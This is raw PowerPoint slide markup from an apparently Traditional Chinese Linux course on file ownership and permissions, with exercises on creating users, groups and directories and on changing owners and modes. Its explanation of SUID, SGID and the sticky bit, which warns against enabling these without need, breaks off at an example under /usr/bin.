              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>SGID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>特殊權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW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 dirty="0"/>
              <a:t>符號類型改變檔案權限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-133200" y="216000"/>
              <a:ext cx="1422720" cy="16956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149400" y="152280"/>
                <a:ext cx="1454760" cy="18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964680" y="1585800"/>
              <a:ext cx="101484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48840" y="1522440"/>
                <a:ext cx="10465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5900760" y="1635840"/>
              <a:ext cx="78624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884920" y="1572480"/>
                <a:ext cx="8179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6993720" y="1593000"/>
              <a:ext cx="707760" cy="147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77880" y="1529640"/>
                <a:ext cx="73944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235960" y="2485800"/>
              <a:ext cx="400320" cy="36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220120" y="2422440"/>
                <a:ext cx="4320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193120" y="2736000"/>
              <a:ext cx="707760" cy="75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77280" y="2672640"/>
                <a:ext cx="73944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828720" y="4107600"/>
              <a:ext cx="19332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12880" y="4044240"/>
                <a:ext cx="2250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300560" y="4043160"/>
              <a:ext cx="193320" cy="7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284720" y="3979800"/>
                <a:ext cx="22500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7343640" y="4029120"/>
              <a:ext cx="957600" cy="572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327800" y="3965400"/>
                <a:ext cx="98964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971640" y="4479120"/>
              <a:ext cx="2443320" cy="644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55800" y="4415400"/>
                <a:ext cx="247500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722120" y="4536360"/>
              <a:ext cx="1100520" cy="216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706280" y="4472640"/>
                <a:ext cx="113220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521720" y="5007600"/>
              <a:ext cx="107280" cy="3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505880" y="4944240"/>
                <a:ext cx="138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1478880" y="5672160"/>
              <a:ext cx="186120" cy="1440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463040" y="5608440"/>
                <a:ext cx="21780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2164680" y="5629320"/>
              <a:ext cx="428760" cy="7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148840" y="5565600"/>
                <a:ext cx="460440" cy="13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8833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2600" dirty="0"/>
              <a:t>請先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>建立三個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>使用者分別</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>’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‘rex’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>rek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>建立三個群組分別</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>‘house’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hand‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>’heard‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>四個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>目錄分別</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>’/lose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/look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/lake’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>look</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>下建立一個檔案為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>'many'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>，將此檔案擁有者設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>使用者。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>lose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>下建立一個檔案為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>'man'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>，將此檔案群組設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>'house'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>群組。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/lake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>下建立兩個檔案為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>'mall'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’large’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>將目錄下所有檔案包含目錄本身所屬使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>'rex'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>下建立兩個檔案為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>'market'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>math</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>，將目錄下所有檔案包含目錄本身所屬群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>heard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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 smtClean="0"/>
              <a:t>檔案權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>實作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>1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4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sz="3400" dirty="0" smtClean="0"/>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>，於目錄內建立一個檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'live'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>，將此檔案擁有者及群組都設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>建立一個使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'rock'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>，將使用者加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>群組。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>‘may’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>‘live’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>權限做變更，讓此檔案擁有者及所屬群組權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>全開、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>其他使用者無權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>請分別登入使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>'rock </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>rek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>，查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'live'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案是否能夠做讀取修改動作。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/>
              <a:t>檔案權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>實</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0" smtClean="0"/>
              <a:t>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549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檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與目錄的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限還有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所謂的特殊權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存在，也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特權</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>』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使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>若無特殊需求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不應該去開啟這些權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>避免安全方面出現嚴重漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>讓怪客入侵。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SUID (Set UID)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：可執行的檔案若搭配這個權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>該檔案便能得到特權</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可以任意存取該檔案擁有者能使用的全部系統資源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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>對目錄無效。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4165560" y="4140360"/>
              <a:ext cx="1854720" cy="1209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49720" y="4076640"/>
                <a:ext cx="188640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619440" y="4610160"/>
              <a:ext cx="1029240" cy="255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603600" y="4546440"/>
                <a:ext cx="10609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962000" y="5626080"/>
              <a:ext cx="1886400" cy="146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46160" y="5562720"/>
                <a:ext cx="1918080" cy="273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5023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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與目錄的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限還有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所謂的特殊權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存在，也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特權</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>』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使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>若無特殊需求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不應該去開啟這些權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>避免安全方面出現嚴重漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>讓怪客入侵。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特殊權限有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SUID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及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三種。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一旦設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就可以看到原先的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>”x”(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>執行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就會變成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>符號。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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5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/>
          <a:srcRect t="8660" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="669059" y="5589239"/>
            <a:ext cx="7445325" cy="723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53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UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>條</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>權限僅對執行檔與二進位程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(binary program)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程式、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者必須需要具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>該</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的權限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特權時機是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>runtime(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程式執行時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運用舉例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
